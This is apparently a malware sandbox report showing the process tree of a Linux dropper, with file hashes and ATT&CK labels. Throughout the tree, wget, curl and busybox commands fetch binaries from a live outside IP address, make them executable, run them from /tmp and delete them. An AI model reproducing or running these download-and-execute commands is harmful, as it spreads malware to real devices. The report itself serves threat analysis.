/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:936
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:937 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:938 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:939
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:940
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:942
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:943 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:944 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:945
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:946
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:948
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:949 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:950 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:951
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:952
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:954
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:955 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:956 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:957
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:958
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:960
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:961 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:962 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:963
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:964
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:966
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:967 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:968 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:969
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:970
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:972
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:973 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:974 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:975
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:976
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:978
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:979 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:980 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:981
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:982
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:984
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:985 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:986 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:987
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97